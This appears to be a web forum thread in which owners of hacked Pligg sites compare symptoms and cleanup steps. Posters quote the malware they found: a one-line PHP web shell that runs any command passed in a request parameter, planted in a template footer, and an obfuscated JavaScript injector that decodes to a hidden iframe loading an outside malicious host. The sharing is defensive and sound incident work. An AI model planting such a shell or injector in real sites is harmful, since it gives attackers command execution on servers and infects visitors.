[plakkerdeplak]

Quote:

Originally Posted by chuckroast

upgrade to the latest version and remove the file admin_editor.php cause it's not used in the latest version, and if you are using an older version of pligg the upgrade wont delete the file from your folder.

Same problem follow your instructions!!

[catchpen]

Quote:

Originally Posted by uTag

I deleted the admin_editor.php a couple days ago and this morning my index.pp page was hacked again... sames JS/Wonka trojan... any other suggestions

My site (note even live yet grrr) got hacked too and then re hacked after 9.9.5. I changed my site database user name and password and deleted the admin_editor.php like Chuckroast mentioned so far no more hack crap.
I'm not sure if it's related but I had a JS/downloader trojan on my PC that supposed to send cookies keylogs etc. somehow to a malicious host. It wouldn't hurt to scan for spyware and virii on your PC too if you haven't yet.

CP

[catchpen]

also check the footer in your template folder. I found

Code:

<cmdout><?php if ( !empty($_REQUEST["cmd"]) ) passthru($_REQUEST["cmd"]); ?></cmdout>

in mine. Hopefully it's remnants from 9.9. Anyone know where else to look?

[chuckroast]

Quote:

Originally Posted by uTag

I deleted the admin_editor.php a couple days ago and this morning my index.pp page was hacked again... sames JS/Wonka trojan... any other suggestions

Hey uTag
Did you delete the contents of templates_c folder? This is the cache folder and even though the admin_editor.php was missing they could still be pulling it from that catch folder. Try deleting everything inside that folder.

[dbish]

My pligg was hacked too. While I took the suggested measures in this forum I also dug in to find out what was going on.

The script that was added just befor the closing body tag of my site has two parts. The first part simply unescapes a string which results in the following function:
<script language="javascript">
function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCod e(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}
</script>

The second part runs the function passing it a string that gets parsed and written as the following:
<iframe src="http://sexonline.fake.hu/10/js_go_f1.php" style="display:none"></iframe>

The full encoded script that produces the above looks like:
<script language=javascript>
document.write(unescape('%3C%73%63%72%69%70%74%20% 6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72 %69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%2 8%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61% 70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C %65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3 D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E% 6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72 %69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%2 8%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29% 2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74 %68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2 E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74% 29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%286 Fliudph%2853vuf%286G%2855kwws%286D22vh%7Brqolqh1id nh1kx2432mvbjrbi41sks%2855%2853vw%7Coh%286G%2855gl vsod%7C%286Dqrqh%2855%286H%286F2liudph%286H3');
</script>

I have run across this before on some of the high volume sites that I manage. There are a lot of resources to tell you how to block the IP addresses of the common attackers, but that can always change.

The one successful way that we were able to get around it was to put a script in place that will cache your clean file structure, monitor it, and disallow any changes to it unless specified in the config file. It cannot "stop" the hacer, but it will ensure that if they do get in they cannot be successful in contaminating your site and scaring off your visitors.

I hope this helps someone...

Dan

[Yankidank]

Have you tried resetting all of your passwords, I'm suggesting Pligg, FTP, Mysql, etc. passwords that might have been discovered.

[jubalince]

Dan, which file(s) does this code appear in? I was hacked too and am trying to fix. Thanks.

Quote:

Originally Posted by dbish

The script that was added just befor the closing body tag of my site has two parts. The first part simply unescapes a string which results in the following function:
<script language="javascript">
function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCod e(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}
</script>

The second part runs the function passing it a string that gets parsed and written as the following:
<iframe src="http://sexonline.fake.hu/10/js_go_f1.php" style="display:none"></iframe>
Dan

[cpayment]

My god!
Any solutions?

[cpayment]

Is that true?
Any ideas?

[watsap]

Quote:

Originally Posted by catchpen

also check the footer in your template folder. I found

Code:

<cmdout><?php if ( !empty($_REQUEST["cmd"]) ) passthru($_REQUEST["cmd"]); ?></cmdout>

in mine. Hopefully it's remnants from 9.9. Anyone know where else to look?

got mine fixed

thanks